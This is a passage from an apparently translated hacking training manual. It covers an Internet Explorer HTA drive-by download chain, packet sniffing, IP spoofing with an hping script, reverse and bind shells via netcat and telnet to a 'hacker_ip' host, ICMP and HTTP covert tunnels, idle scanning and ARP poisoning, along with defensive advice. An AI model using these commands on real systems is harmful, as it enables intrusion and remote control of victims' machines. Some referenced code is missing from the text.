Beware of this type of alert as some of IE's vulnerabilities mean that one could believe that the script is a part of the local zone when in fact it is on the Internet. Security To avoid this type of attack (very often used by Spywares), the thing to do is to properly parameter the Internet Explorer options or simply to change the navigator, because ActiveX only function with IE. It should be known that IE functions with a zone system whereby various rights can be defined. There is an “Internet” zone and a “Local Intranet” zone as can be seen below:
The Hackademy
DMP
-54/209-
SYSDREAM
Each one of these zones can be configured independently. Generally, the “Local Intranet” zone will be less restrictive than the “Internet” zone which is often the more dangerous one. It is advised to deactivate the ActiveX execution by clicking on “Personalising the level”.
B) .hta Loopholes This type of loophole mainly affects Microsoft's Internet clients, especially Internet Explorer and Outlook Express. The idea is to have them execute arbitrary code through javascript and vbscript code. In theory, parameters by default of the navigator forbid the execution of a code that could be hostile if it comes from the Internet or a zone that is not considered as safe. However, executing this code locally (for example with a html page from the file history) is entirely possible, as the security policy is much more restrictive. HTA files are Windows help files and are also in fact compressed HTML files. They can therefore contain Javascript or Vbscript code. As they are executed locally on the machine, the interpreted code will also be considered as local. Security options are therefore much less restrictive. The principle of the attack will be to have the web navigator execute a javascript code, which will force the local downloading of a HTA file, as well as its reading, in order to have it locally execute a Vbscript code, destined to download then execute a virus; all of this happening without the user's intervention, of course. One last problem remains: with the security restrictions by default, it is not possible, even locally, to execute a programme without asking for the user's authorisation. We will therefore use another loophole (the shell loopholes), which can start a programme on the system by associating it to a file to read. Instead of simply downloading the virus, we will crush an existing binary on the system and start it by asking to open a file to which it will be associated: so it will be the virus which will then have replaced the initial binary to be started. Shell Vulnerability Shell is a protocol that can be used in a URL to open any brief or file on the system. In the Start>Execute window, type in the following commands: shell:windows shell:cookies shell:recent shell:system shell:Common AppData shell:Common Desktop shell:Common Documents shell:Common Favorites shell:Common Programs shell:Common Start Menu shell:Common Startup shell:Common Templates shell:Common Administrative Tools shell:CommonVideo shell:CommonPictures shell:Personal shell:local appdata The Hackademy
DMP
-55/209-
SYSDREAM
shell:profile shell:Administrative Tools
This type of command can be given to the web navigator so that it can execute the associated command. Place the following code in a HTML page (replace Windows by what is convenient on your machine):
This vulnerability can be used to force IE to open a file with the associated programme according to the extension. Copy a bmp picture that you will rename hack.bmp in your Windows directory and copy this script on a html page. The mspaint.exe programme will then be started:
src='shell:windows\hack.bmp'
name="x"
Taking advantage of the hta loophole: Let us summarise the attack procedure: Hostile Javascript Code: 1. Downloading and execution of a .hta containing Vbscript code, via a hostile javascript code (attack.htm file) Hostile .hta: 2. Downloading of an executable which then crushes mspaint.exe 3. Downloading of a bmp picture in the Windows directory 4. Request the opening of the picture via a shell loophole, forcing the execution of the file renamed in mspaint.exe On the www.thehackademy.net website, you will find a directory with all the files destined to take advantege of this type of vulnerability: attack.htm: The hostile javascript code EXPLOIT.CHM: The hostile chm exploit.exe: The executable to have the web navigator start hack.bmp: The picture to copy on the system
The Hackademy
DMP
-56/209-
SYSDREAM
The javascript code destined to download .hta:
The Vbscript code contained in .hta. Once again, replace the Windows directory of this code by what is appropriate on your system (windows or winnt):
This html code will have to be compiled in .hta format. To do this, you can use the HTML help workshop programme: Create a new project, by selecting the “new” button:
The Hackademy
DMP
-58/209-
SYSDREAM
The wizard will ask you the location and the name of the new project:
Select a htm-type file as project source:
You will give the exploit.htm file whose code was given above:
The Hackademy
DMP
-59/209-
SYSDREAM
Finally, you will be able to compile the project thanks to the file->compile button; the htm file will thus be automatically generated in the directory where you have saved the project. Once all the files are ready, copy the 4 previously mentioned files into a web server directory. You then only have to open your web navigator to have it point to the attack.htm page and the executable will automatically be open.
The Hackademy
DMP
-60/209-
SYSDREAM
CHAPTER III NETWORKS VULNERABILITIES
The Hackademy
DMP
-61/209-
SYSDREAM
1. Network Sniffing A) Theoretical Approach Sniffing is a spying technique which consists in copying the information contained in network packets without modifying their transportation or their shape. When an A machine contacts a C machine, data will transit through an intermediate machine, a B machine. A -----> B -----> C To reach C, A must have the packet transit through B. B could be controlled by a hacker, and this hacker could then maliciously pick up the data transiting between A and C and make a copy of it for later analysis. Sniffing makes it possible to pick up the data that makes up the network packets, i.e. the different options and variables incremented in the packets (Source IP address, Destination IP address, Flags, etc.), as well as usual data (web pages' source codes, logins and passwords, commands sent to a server, etc.) The reason sniffing exists is the security weakness of the vast majority of protocols. The confidentiality of data transmitted with the most common protocols (TCP, HTTP, FTP, SMTP, ...) is not ensured because these communications are not encrypted. In some network environments, it is not even necessary to be part of the relay system (router, gateway, etc.) to undertake network sniffing... Networks environments : simplicity and limits of sniffing In some network environments, it is not necessary to be in control of the relay machine to spy on the whole data flow. This is for example the case for network architectures structured around a HUB. The whole network created around a hub is vulnerable to a Sniffing-type technique. All packets emitted on the network are broadcast to all the systems present. By analysing the destination MAC address, the system receiving the packet can decide if this packet is destined to it or if it must be dropped. However, on a hub network, this method is limited to zones belonging to the same network segment.
Here, machine 1 sends a packet on the network (its destination is of no relevance to us). To relay it, the HUB sends it again to all the other machines of the network.
On this diagram, machine 2 could be a hacker one. It could then spy on all the network traffic of all the machines linked to the HUB, because all packets are sent back to it.
The Hackademy
DMP
-62/209-
SYSDREAM
Here, the connection between the router and machine 3 cannot be sniffed by the rest of the network.
It is to be noted that the same network architecture could be created not around a Hub but around a Switch: this is an intelligent hub which saves in a corresponding table the MAC address and the Ethernet port number of each machine it is connected to. Then, it will not broadcast the emitted packets but ask its cache to determine on which Ethernet port it must send the packet. • •
Network overloading is much less frequent and the network traffic itself is minimized. It is in theory no longer possible to sniff transiting connections on the LAN.
Practical Approach : installation of a sniffer The reference for sniffers remains Ethereal, on both Windows and Linux, which includes a very performing analysis system of transiting packets. You will find this tool at: http://www.ethereal.com. You will also have to install WinPCAP library which can enable you to use sniffing on Windows. You will find this at http://winpcap.polito.it. Practical Approach: using a sniffer We will start by doing brute sniffing sessions before we look at the powerful capture options. 1. Click on Capture 2. Click on Start.
The Hackademy
DMP
-63/209-
SYSDREAM
A parametrization window of the capture session opens. Among the various functions at hand, please note that you can specify in “Interface” the peripheral to initialize. If you have several network cards, you can sniff the traffic on the card of your choice. Among other options that are interesting to modify, we should note the “Display Options” and “Capture Limits”. To follow in real time the sniffing of packets, activate the options "Update list of packets in real time" and "Automatic scrolling in live capture". For your first try, activate the following options : • • •
Capture packet in promiscuous mode. Update list of packets in real time. The 3 options of "Name resolution".
NB: By default, a card will only recover packets addressed to it, the others being destroyed. To read packets destined to other computers, the hacker will have to put the card into a special mode called the “promiscuous mode”. The card will from then on pick up all packets. It is however important to note that since this card must be handled at a very low level for this change of functioning mode, administrator privileges are necessary.
The Hackademy
DMP
-64/209-
SYSDREAM
The capture status window indicates how many packets have already been sniffed, as well as the majority of common protocols to which these packets are related. It is also this window that ends the capture session.
Using the "Follow TCP Stream" option The "Follow TCP Stream" option can isolate a “conversation” or an exchange of data between two specific machines. So if in the results of your capture session you wish to zoom quickly on one communication, then do as follows: 1. Select the packet emitted from one machine to another. For example, click on the line corresponding to a packet emitted from machine A to B. 2. Right-click 3. Click on "Follow TCP Stream" 4. A new window opens and all it contains is the data processing exchange that has taken place between the two machines. A colour code is established to distinguish data belonging to different machines. 5. At the bottom of the software's main window, in the “Filter” zone, is displayed the filtering information that allows for an efficient selection of screen display to highlight the exchange that is of interest to us. A good mastery of this software is essential to perfectly understand the meaning of this filtering. In the present case, this is not necessary.
Using the filters As seen previously, filters will allow you to discriminate among information that has been captured or that is being captured. You can create filtering options with the software's designated interface: 1. In the software, click on the "Edit" tab, 2. The, click on "Display Filters", 3. A window then opens which will allow you to create filters. We will see, with several specific examples, how to efficiently manage your filters.
The Hackademy
DMP
-65/209-
SYSDREAM
Example 1 : Filtering only HTTP packets. 1. In the "Ethereal : Edit Display Filter List" window, click on "Add Expression", 2. A window then opens which lists all protocols recognized by the software, 3. Go to HTTP,
5. Click on HTTP. It is not necessary to go to the “Relation” column. We will see in a later example how this column will be of use to us. 6. Click on "Accept", 7. You return to the Filter Management window. In “Filter String”, “http” should be displayed. 8. Give a name (“Filter Name”) to this filter. You can give “http” as a name if you want it to be evocative. 9. Click on "New", 10.A new filter has tied itself to your list of filters, the one you have just created. 11.Click on "Save" then on "Close". The Hackademy
DMP
-66/209-
SYSDREAM
You have just created a new filter. In your future snapshots, you will be able to apply it in the following manner: 1. Start a new snapshot, 2. Click on the Filter button at he bottom of the software,
3. Select the appropriate filter, 4. Click on "Apply". However, do make sure that the filters are only used to discriminate information that is displayed for a better visibility. In a snapshot, Ethereal will still pick up all packets. This is in no way an inconvenient, for it will enable you to return to a complete display of information. Let us now study a second example of filter creation, a slightly more complex one. Example 2 : filtering by IP addresses. What we would like to do this time round is to visualize only the network packets specific to one IP address. We will suppose that you wish to filter only the network packets emitted towards IP address 125.125.125.125. 1. 2. 3. 4.
In the "Ethereal: Edit Display Filter List" window, click on "Add Expression", A window then opens and it lists all protocols recognized by the software, Click on "IP" in the list, then in the "Relation" column, click on the equal double sign, Enter IP address 125.125.125.125 in the appropriate "Value (protocol)" slot,
5. 6. 7. 8. 9.
Click on "Accept", Give a name to the filter, and click on "New", Then click on "Save" and "Close", Start a new snapshot, Click on the Filter button at the bottom of the software,
10.Select the appropriate filter, 11.Click on "Apply", 12.Open telnet.exe in the following manner: go to “Start", then "Execute" et type telnet 125.125.125.125 , 13.Validate with "OK", 14.On the main Ethereal window is displayed only the information relative to your connection attempt towards 125.125.125.125 (and no other information). The Hackademy
DMP
-67/209-
SYSDREAM
Security Sniffing is actually just a legitimate way of listening to transiting traffic, so it is difficult to establish security solutions that are really efficient. It is therefore strongly recommended to always use encrypted information to ensure transiting data remains confidential.
2. Network Spoofing A) Presentation IP spoofing is not actually an attack itself, but can be used in many other intrusion or information gathering techniques (see Idle host scanning). Spoofing is a technique that can use the existing “network confidence relations” between various machines. We will take advantage of the fact that IP : • • •
is one of the most solicited protocols. is an uncertain network protocol, it is not connected and does not handle packets that have already been transmitted, nor does it handle those that are going to come. it does not in any way handle packet security or confidentiality, this role is left to the upper layers
IP is often coupled to the TCP protocol, and this gives it the reliability that it otherwise lacks. TCP is a “connected” protocol and before being able to exchange information, the machines concerned will have to establish a connection (3-way handshake). This reliability is ensured in two ways: – –
Sequencing. Acknowledging.
B) Establishing a TCP connection As mentioned previously, in order to exchange information, two machines must first establish a connection (TCP in this case). To illustrate this technical aspect, we are going to use Ethereal, which will enable us to sniff packets transiting through a network interface. In the present case, let us consider a “telnet” connection between two machines. Machine A does a telnet on machine B on port 6666... The Hackademy
DMP
-68/209-
SYSDREAM
This handshake takes place as follows: First step
The machine sends a packet to request the establishment of a connection to machine B.
Illustration 1: SYN
Each packet (or datagram) has what is called a header with a length of 32 bits. It contains various informations, and these are the ones of interest to us: •
A “flag” system that can determine to what the packet corresponds. In our case the packet contains an initialized SYN “flag” (fixed at 1).
•
A sequence number (SEQ) created randomly by the kernel.
The Hackademy
DMP
-69/209-
SYSDREAM
Second step Illustration 2: SYN/ACK
To this request from machine A, B will answer with a SYN/ACK, meaning that this time round the packet sent by B to A will have two bits initialized at 1: the SYN bits and the ACK bits. It is then machine B's turn to send a sequence number (SEQ), also created randomly, and also an ACK number which is the sequence number sent by machine A + 1.
The Hackademy
DMP
-70/209-
SYSDREAM
Third step
Illustration 3: ACK
To conclude this connection, machine A, in response to the SYN/ACK sent by B, sends an ACK back to it (only the ACK bit is initialized). The packet still contains an ISN and an ACK; the value of the ISN is the ACK number of the previous packet sent by B, and for ACK it is the sequence number of the previous packet sent by B + 1 (during the connection initialization). Later on, the ACK sent by a local machine to a remote machine will be made up of the sequence number sent by the remote machine in its last packet, to which will be added the number of data bytes received during this transmission.
The Hackademy
DMP
-71/209-
SYSDREAM
C) The attack Description We will try to establish a spoofed connection on a network machine by usurping existing IP confidence relations: • • • •
First, a machine must be found that the target machine trusts. Then, the authentication of the machine is done from its address. Once this information is obtained, the authenticated machine must be made “mute” (to prevent it from answering the target machine) Then the sequence number, which is expected by the target machine, has to be determined. Once that is done, we can start sending packets with the IP address of the machine that we have “withdrawn” from the discussion.
The main problem with spoofing is that it is a so-called “blind” attack. It is not the machine itself that is authenticated but the packets that the victim machine receives. This means that the packets emitted by the target machine are not recovered by the attacker but are quite simply lost (as the destination machine is “not able to answer”). This means that the attacker does not have the information sent back by the target and so does not have the sequence numbers corresponding to the packets that have been sent back by this same machine. That is why this is called a “blind” attack, which is also why it is in fact impossible to carry out. Why is that? To pass as the authorised machine for the target machine, packets have to be “forged” (using Excalibur Packet, for example); and these packets must of course present, instead of the attacking machine's IP address, the address of the authorised machine now made “mute”. But the packets must also present sequence numbers corresponding to the exchange that the target machine believes to be having with a trusted machine. As the packets emitted by the target machine are not recovered by the attacker, the latter has no way of determining the sequence number sent by the target machine and therefore the sequence number that this machine will expect in response to the last packet it has sent. This would be possible if packets were generated in a foreseeable manner, however that is not the case, at least concerning systems such as BSD, SUN, Linux, or more generally UNIX. These various OS have a sequence number generation system that make these numbers totally unforeseeable (because they are far too random). In the case of Microsoft, the latest studies of the problem pointed to the fact that the sequence numbers generated by Windows are linear and thus easily predictable, and so making the machines using them particularly vulnerable to this type of attack.
Example As seen previously, blind spoofing is of no interest because it is almost impossible to carry out. The only solution is therefore to use Non Blind Spoofing (NBS). To do this, the attacker first has to recover a router or a local network machine using HUBs (switches only give information to the machines concerned and so we would find ourselves in a blind spoofing situation again). The Hackademy
DMP
-72/209-
SYSDREAM
The methodology of this type of attack remains standard: •
•
•
Sniff the packets transiting between two machines with the help of Ethereal. That way, we will be able to obtain the sequence numbers sent by the target machine to the machine whose identity we are going to usurp. “Forge” packets with the same header as packets sent by the spoofed machine (that is with the spoofed machine's IP and with a sequence number corresponding to the sequence number that the target machine expects to receive). Establish a connection.
In our case, we are going to operate differently and use an arp poisoning... Let us take a machine A, a machine B and a machine C. We know that a “confidence relation” exists between machine B and machine C; however machine B systematically “drops” all packets coming from machines other than machine C.
Our machine A will first carry out an “arp poisoning” on machine B, with the aim of corrupting its arp cache. To do this, we are going to send packets of the “arp reply” type to machine B with the “arp poison” program. This way, the MAC address of our machine C will have the same MAC address as machine A, and so when a packet leaves machine B for machine C, it is actually sent to machine A (our attacking machine). So we are no longer in a case of blind spoofing, since we are going to be able to recover (still using Ethereal) the packets that machine B believes is is sending to machine C. With the help of the hping program, which can be downloaded frm http://www.hping.org, we are going to simulate a TCP-type connection on port 2222 of machine B. We can automate this approach with the following shell script:
The Hackademy
DMP
-73/209-
SYSDREAM
#!/bin/sh /usr/sbin/hping -a 192.168.0.2 -p 2222 -s 2110 -S -M 33 -c 1 192.168.0.66 read u /usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -M 34 -c 1 192.168.0.66 /usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -P -M 34 -c 1 -d 6 -E data 192.168.0.66
To make things clearer, we are going to describe the options used for this script: -a : Address of the spoofed machine. -p : Destination port of the packet. -s : Port used by the emitting machine. -S : SYN flag is initialized. -M : The sequence number sent by the emitting machine is determined. -c : Number of packets sent. -A : ACK flag initialized. -L : ACK number determined. -P : PSH flag initialized. -d : Can stipulate the size of data sent. -E : Can “take” data from a file. 1. As seen previously, machine A is going to send a SYN packet to machine B, using of course the address of (spoofed) machine C to prevent our packet being “dropped” by machine B (and so not processed). 2. With the help of Ethereal we are going to recover the SYN/ACK packet that machine B is going to send on to machine C. 3. As ACK, we send back the sequence number sent by machine B incremented by 1. Machine B: SEQ=1442628982 ------> Machine A Answer: ACK=1442628983 Let us have a look at Ethereal ... (figure 4) We can note that we have the same combination SYN,SYN/ACK,ACK, typical of an authorized connection. Bingo! The connection is now initialized.
The Hackademy
DMP
-74/209-
SYSDREAM
Figure 4: Simulation of a connection
The case of the UDP protocol Unlike TCP, UDP is a non-connected protocol, which makes it extremely easy to study (as well as to falsify). This protocol does not provide any error control as it does not check packets that have already been transmitted and those that are yet to come. So the header of a UDP segment is a very simple one: It is made up of four informations, as well as the data segment, of course: •
Source Port: This is the port number corresponding to the emitting application of the UDP segment. This field constitutes an answering address for the destination. This field is optional, so it means that if the source port is not specified, the 16 bits of this field will be put to zero, in which case the destination ill not be able to answer (this does not have to be the case, especially for one-way messages).
•
Destination Port: This field contains the port corresponding to the application of the destination machine we are addressing.
•
Length: This field specifies the total length of the segment, header included, and as the header has a length of 4 x 16 bits (or 8 x 8 bits), the length field has to be equal to or above 8 bytes.
The Hackademy
DMP
-75/209-
SYSDREAM
•
Control sum: This is a control sum done in such a way that it can control the integrity of the segment.
As UDP does not function at all like TCP, especially as far as sequence numbers are concerned, it is much easier to spoof since we do not have to determine the valid sequence number to forge our spoofed packets. The operation remains the same: we forge packets with an usurped address, which allows us to establish a connection with our target machine without having to determine “Acknowledge” sequence numbers. Security Confidence relations based on IP addresses can therefore not be considered as weak, although exploitation techniques are difficult to apply. So you should prefer trust relations based on authentication systems with key, such as those presented at the end of this training course, in the VPN section.
3. Firewall Bypassing A) Reverse connection The aim of firewalls is to filter incoming or outgoing traffic to prevent an intruder from entering an internal system. Quite often, however, the existing rules are insufficient, and the firewall can be as useful as if it did not exist. The first source of error is often not to limit the outgoing traffic, the idea being to allow users to make use of certain public services, especially http, smtp or pop3. Client stations within the company thus have access to various network services on the Internet. So the principle of these attacks will not be to ask the target machine to bind a shell on an arbitrary port, but rather to ask it to connect on output on ports authorized by the firewall destined to the hacker machine (or a machine controlled by the hacker), and to send back a command interpreter in this twoway communication canal. This technique can actually be used because a canal can have data circulating both ways and be attached to any executable (such as a shell), whether it be at the client or at the server level. We will start by studying two techniques that can be used on Linux: ➢
The inverted telnet: The idea here is to create an inverted connection, meaning that it is the server that connects to the hacker's system. To do this, two distinct canals must be created: The hacker places two ports to listen on his system (using netcat for example), then he asks his target to connect to each of his ports. The hacker can then write in the first listening netcat spy, and this data will be intercepted by the remote system , interpreted by a shell, then sent back in the other canal created at the second telnet session connected to the hacker's second netcat spy. On his machine, the pirate creates two spies on ports 887 and 888 (with the help of netcat). The remote system connects to the two netcat spies by piping the received data through the first canal to the shell then by piping these results again to the second canal, with the command: telnet hacker_ip 887 | /bin/sh | telnet hacker_ip 888
The Hackademy
DMP
-76/209-
SYSDREAM
nc -l -v -n -p 887
nc -l -v -n -p 888
Injection of commands in this canal
Reading of the results sent back by the remote system
If a remote host executes an X server, it is then possible to ask it to send back an xterm on our system: this is an x console which will display the hacker's X server. First of all, the remote host has to be authorised to connect to the X server, with the command: xhost +ip_de_l_distant_host Then the server has to be asked to send back this xterm on the hacker's system. The command to be executed has the following form: xterm -display pirate_ip:0.0 An Xterm console belonging to the target server is then sent back providing an interactive access to the hacker. In a much more generic way, on Windows and Linux, it is possible to use the netcat tool to carry out this type of operation, if it is present on the target system (or if it is possible to upload it). This tool can be given the -e option, which can associate the canal to the binary specified with this option (cmd.exe on Windows, /bin/sh on Linux). On the hacker's side, a port is binded, to which the target will connect, with the command: nc -l -v -n -p port The target is asked to connect to the hacker and to send back a shell with the command: nc hacker_ip port -e cmd.exe B) Covert channel Presentation A covert channel is actually a method which consists in generating a data flow through another one in order to make it more difficult to detect, with the aim of breaching firewalls. We are going to see several examples of use: the use of http as well as icmp protocols. We are going to make a data flow go through another one.
The Hackademy
DMP
-77/209-
SYSDREAM
Situation scenario: Using icmp Let us consider machine A (ip : 192.168.0.2) and machine B (ip : 192.168.0.66). Let us start with a situation where we do not use any covert channel and let's see what Ethereal has to say about that. Machine B bash$ nc -l -p 6666 -e /bin/bash Machine A bash$ nc 192.168.0.66 6666 cat /etc/issue Debian GNU/Linux 3.1 \n \l
We can clearly identify a tcp session corresponding to a shell. The information passes clearly on the network. Our communication will be directly identified by an administrator with a minimum of professional conscience. Let's now make a small change. On machine B, we will do this: Machine B bash# iptables -A INPUT –proto tcp –source ! localhost -j DROP The machine will thus not be able to receive tcp data from a non-local source.
The Hackademy
DMP
-78/209-
SYSDREAM
Let's try to connect again from machine A. Machine A bash$ telnet 192.168.0.66 6666 Trying 192.168.0.66... telnet: connect to address 192.168.0.66: connection timed out bash$ The communication is not accepted, the packets are dropped. We are going to try to bypass the problem by using an icmp tunnel to send our data. We will use icmptunnel (available at: http://packetstormsecurity.org/crypt/vpn/icmptunnel013.tar.gz). An icmp tunnel between our two machine will be created. This diagram shows what is going to happen:
Installation of icmptunnel on the two machines (A and B): bash$ wget http://packetstormsecurity.org/crypt/vpn/icmptunnel013.tar.gz bash$ tar xvfz icmptunnel013.tar.gz bash$ cd icmptunnel bash$ make -f Makefile.tomas We obtain an executable named “t”. This executable uses raw sockets, and will have to be started using root rights. On machine B, we are going to start an icmp tunnel (attached to a local port) towards machine A, and we are going to associate a shell to the local port. To do this, we will proceed as follows: Machine B bash# ./t -S ICMP_ECHOREPLY -R ICMP_ECHO -L 7777 -i 15 -I 8 192.168.0.2 Information is displayed to sum up the chosen options (icmp is by default very “talkative”, which allows us to analyse everything that is happening. It is possible to make it “less talkative” by withdrawing the -DDEBUG option from the makefile).
The Hackademy
DMP
-79/209-
SYSDREAM
-S: -R: -L: - i: -l: 192.168.0.2
can specify the type of icmp packet when we send data through our canal. We choose packets of the echoreply type. can specify the type of icmp packet that we should receive through our pipe. We choose echo type packets corresponding to packets of the echorequest type. This the local port to be used. This an identifier related to the tunnel. It is the tunnel identifier used by the target machine. This is the tunnel identifier used by our machine. For our two machines to be able to communicate through our tunnel, they must each have a tunnel identifier and it must be specified in both cases. This is the target machine.
We will now attach a shell to our local port, as follows: bash$ nc localhost 7777 -e /bin/bash Now we will start our tunnel on machine A. Machine A bash# ./t -S ICMP_ECHO -R ICMP_ECHOREPLY -L 9999 -i 15 -I 8 192.168.0.66 And now we can connect on our local port via netcat : bash$ nc localhost 9999 cat /etc/issue; Debian GNU/Linux 3.1 \n \l We were able to establish a connection to the shell started on the remote machine, in spite of the firewall. Let us take a look now at what Ethereal is seeing:
The Hackademy
DMP
-80/209-
SYSDREAM
We can see that Ethereal has seen icmp type traffic go through. We can also see that the data has passed clearly. Icmptunnel is not very functional in the sense that data is not coded. Another example: using HTTP Following the same principle, we are this time round going to use the HTTP protocol (used by web servers). We will this time use the httptunnel program (available at: http://www.nocrew.org/software/httptunnel/httptunnel-3.0.5.tar.gz). Installation on both machines : bash$ wget http://www.nocrew.org/software/httptunnel/httptunnel3.0.5.tar.gz bash$ tar xfvz httptunnel-3.0.5.tar.gz bash$ cd httptunnel-3.0.5 bash$ ./configure && make && make install We then obtain two executables: hts and htc (respectively for http server and http client). One of these executables will thus be used as a server and the other as a client. We are going to bind a shell on machine B then attach to it our http tunnel, as follows:
The Hackademy
DMP
-81/209-
SYSDREAM
Machine B bash$ nc -l -p 9999 -e /bin/bash bash$ su bash# ./hts -F localhost:9999 80 The -F option can specify the source and the destination of data received by the http tunnel. In this case, we have attached a shell to local port 9999, and the port relevant to our tunnel will be port 80 (port by default for all web servers). Now we are going to connect machine A. Machine A bash$ ./htc -F 2222 192.168.0.66:80 bash$ nc localhost 2222 cat /etc/issue; Debian GNU/Linux 3.1 \n \l Let us take a look at what Ethereal is seeing:
Ethereal sees http traffic transferring. Data is hidden in http packets, this way passing through in a much less noticed way. The Hackademy
DMP
-82/209-
SYSDREAM
Conclusion The covert channel principle can apply to virtually all protocols (http, icmp, dns, ...) The thing to know is where and how to hide data within the protocol used.
Security The best way to fight against firewall bypassing is to forbid direct access of internal stations to the Internet. You should implement total restriction and integrate an internal proxy server which will be the only one authorized to communicate with the outside world. If internal stations wish an outside connection, they will always have to go through this mandatory server. You can integrate the same security policy for servers accessible from the Internet by implementing reverse proxies, through which clients will always have to go.
4. Idle Host scanning In the previous section, we discovered what IP spoofing was. We will now see how a hacker can use this technique to scan a server without leaving his IP address in the logs. The aim of this is to prove that IPs in your log files can be faked, and to encourage you when possible to establish filtering rules so that no “idle host” can have access to the server, which will prevent the usage of this scan technique. Let us take a closer look at this... Idle host scanning is a technique found by the creator of Hping, which enables the scanning of a server's ports without leaving an IP in the logs, and by using IP spoofing. But to do this, we need a machine that is not very active, as this will help us determine the server's open ports. Practical simulation of such an attack: We are going to use three machines: – – –
An attacking machine on Linux or Unix equivalent which we will call A A target server called S A not very active machine called C
Machine A must be on Linux or equivalent and with Hping installed (it can be downloaded from http://www.hping.org). First of all, what is going to be of interest to us will be to control the incrementation of the IP protocol's identification (id) number of the packets emitted by C. To do this, two conditions must be reunited: we must force machine C to send us tcp/ip packets (whatever they may be) in a continuous manner, and C must have no active connection for the whole duration of the operations (except, it goes without saying, with A). We can immediately see the advantage in choosing a client machine for C. As it is not a server, it is more likely we will be the only ones communicating with it.
The Hackademy
DMP
-83/209-
SYSDREAM
To dialogue with C and to force it to reveal its id, two solutions can be imagined: 1) We try to initialize a connection on an active port of machine C by sending packets with the Syn flag activated (this is very important, otherwise the machine will not answer). The machine will then answer by sending packets with activated Syn and Ack flags. 2) We send packets to a closed port (there is no need to activate a flag). The machine will believe it is an error and will send response packets with Ack and Reset flags activated. Which is the best method? Both actually work very well, however the first one presents two major disadvantages: if we want to follow the same logic we have had since the beginning, choosing a machine C with even only one open port is ridiculous (in this case it is a server and the risks of establishing a connection with anyone other than A are high). Also, sending a flood of connection requests to C on a specific port could be unfavorably interpreted by a watchful administrator who checks his logs (he could believe it is a syn flooding or a syn scanning). We are therefore going to forge packets according to the second method, and to do this we will use hping. Hping, just like Nemesis, is a tcp/ip packet forger. Why choose hping? Because hping has an interesting function that allows it to log on console of answers to packets emitted via hping. All that has to be done is to type in the following command: hping -r (for example: hping 192.168.1.1 -r) Here, -r corresponds to the option showing the id increment as emissions are taking place (this option will be used only for clarification purposes).
Here is a capture done with Ethereal of packets sent and received successively between machines A and C. 1st packet: In the capture, machine A has IP 192.168.1.2 and machine C has IP 192.168.1.1. The Hackademy
DMP
-84/209-
SYSDREAM
It is the IP protocol that is going to be of interest to us :). So the first packet is sent from machine A to machine C. It is a TCP packet sent on port 0 of machine C, with all flags at 0, and with a sequence number and an acknowledgement number. Please note that here the IP identification is equal to 0x934d. 2nd packet :
Machine C answers with a TCP packet with RST/ACK at 1. (This is normal as port 0 is not open). Please note that its IP identification number is 0x934d.
The Hackademy
DMP
-85/209-
SYSDREAM
3rd packet : Machine A sends back TCP packet on port 0 with all flags at 0.
Please note that the IP identification number has been incremented of several bits, from 0x848 to 0x1923. 4th packet : The machine answers with a TCP packet identical to the 2nd packet. Now look at the IP identification number: it has been incremented of +256!
The identification number of machine A is always incremented of +256. But remember that it is not the value of the increment that is of interest to us here but rather the fact that it remains constant. Thanks to this identification number, we will be able to determine if a port is open on server S. Now, machine A must send a spoofed packet to server S, to make it believe that machine C wishes to connect. To establish the scan, the first window is left open and another one is opened in which we will type: hping -a -S -p Example: hping -a 192.168.231.81 -S -p 21 192.168.231.1 where 22 is a port and we are going to try to determine if it is open or not.
The Hackademy
DMP
-86/209-
SYSDREAM
We will simultaneously launch the packets emissions for a better analysis of results. First terminal; emission of spoofed packets to server S.
Here, C asks for connections to S. The ID is incremented of +1 at each sending. Second terminal: emission of TCP/IP packets to client C.
Let us have a look at the same time at what is on our second terminal, the only one of interest here. We notice that the packets' ids are all incremented of +1, but from the 3rd onwards, the increment is doubled (+2). The ID is doubled during the emission of 6 packets, and exactly 6 packets had already been emitted (see bottom of the previous capture). What can the conclusion be? As the ID has doubled, it can only mean one thing: 8 packets have been emitted by C but they were not destined to A, hence the increment jump from +256 to +512. What were these packets? If you refer to the previous chapter, these were obviously packets going from C to S with the RST flag active. But why is that? It is because C has never itself requested a connection. So it informs S with each packet with a Syn / Ack that it receives that this is an error.
The Hackademy
DMP
-87/209-
SYSDREAM
We know that the server of interest to us, port 21, is closed. So we will repeat the same method by exchanging port 22 for port 21. Let us take a look at the results. First terminal: emission of spoofed packets to server S.
Second terminal : emission of TCP/IP packets to client C.
Here, we can see that the ID has not changed. Why? Because a machine never responds to a Reset. When a port is closed, there is no “leaking” of packets, so there are no more modifications of the ID. You probably understand now how vitally important it is that machine C communicate only with A. Conclusion In this chapter, we seen the functioning principle of this type of scan. Please note that Unix users make use of the famous fyodor (nmap) port scanner (downloadable at http://www.insecure.org). It takes into account this type of scan and can be very powerful. You will also note that even if you are not in S's logs, you are in those of C. So a hacker can be found...
The Hackademy
DMP
-88/209-
SYSDREAM
5. Connections Hijacking We are going to use the properties of the data transmission model on a local network in order to hijack a third machine (the hacker's machine), with the flows transiting on the network. On a LAN, packets destined to an IP address of the same network are not routed but sent directly to the communicating machine. So the packet will be encapsulated in an Ethernet packet (layer 2 of the OSI model) whose destination MAC address will be that of the machine associated to the IP address that we want to attach. To know what the MAC address associated to an IP is, the kernel will consult its ARP cache which associates internal network IPs and MACs. You can consult your cache with the arp -a command: arp -a Dantes (192.168.124.20) at 00:50:22:80:B3:34 [ether] ? (192.168.124.1) at 00:09:5B:44:AA:E4 [ether]
These entries in the cache are not permanent. When booted, the system is empty. It is when a packet is first sent to an IP that is not associated to any MAC that will be resolved the physical address of the host we wish to reach. What's more, these entries disappear after a certain timeout. The protocol that can associate IP and MAC is ARP (Address Resolution Protocol).
A) ARP Cache Poisoning Machine A wishes to reach machine B, but no entry corresponding to B is found. A sends an ARP Request in broadcast on the network asking what is the MAC address of machine B. Machine B receives this packet and answers. At the same time, B will have noted A's MAC to associate to A's IP in its ARP cache. B sends an ARP response to A, in order to fill its ARP cache by associating IP A and MAC A. ARP Request sent by A: MAC SRC
IP SRC
MAC DST
IP DST
MAC A
IP A
FF:FF:FF:FF:FF:FF
IP B
MAC SRC
IP SRC
MAC DST
IP DST
MAC B
IP B
MAC A
IP A
ARP response sent by B to A:
With the help of tcpdump, we can sniff the transiting ARP Requests: tcpdump arp tcpdump: listening 15:57:28.027387 arp who-has Dantes tell 192.168.124.12 15:57:28.028122 arp reply Dantes is-at 0:50:22:80:b3:34
The Hackademy
DMP
-89/209-
SYSDREAM
